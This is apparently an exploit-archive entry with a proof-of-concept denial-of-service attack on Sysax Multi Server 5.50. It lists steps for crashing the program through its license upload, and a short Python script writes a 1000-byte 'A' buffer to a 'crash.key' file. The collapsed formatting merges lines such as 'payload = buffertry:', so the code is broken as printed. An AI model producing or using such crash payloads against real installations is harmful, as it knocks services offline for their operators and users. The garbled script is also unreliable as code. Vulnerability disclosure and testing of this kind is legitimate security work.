# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC) # Google Dork: NA # Date: 2020-01-20 # Exploit Author: Shailesh Kumavat # Vendor Homepage: https://www.sysax.com/ # Software Link: https://www.sysax.com/download.htm#sysaxserv # Version: Sysax Multi Server 5.50 # Tested on: WIndow 7 # CVE : [if applicable] 1) Download software install in window 7 2)run software then click install license 3) upload crash.key file and it will show run again this program 4 ) program crash , never run #!/usr/bin/python buffer = "A" * 1000 payload = buffertry: f=open("crash.key","w") print("[+] Creating %s bytes evil payload." %len(payload)) f.write(payload) f.close() print("[+] File created!")except: print("File cannot be created.")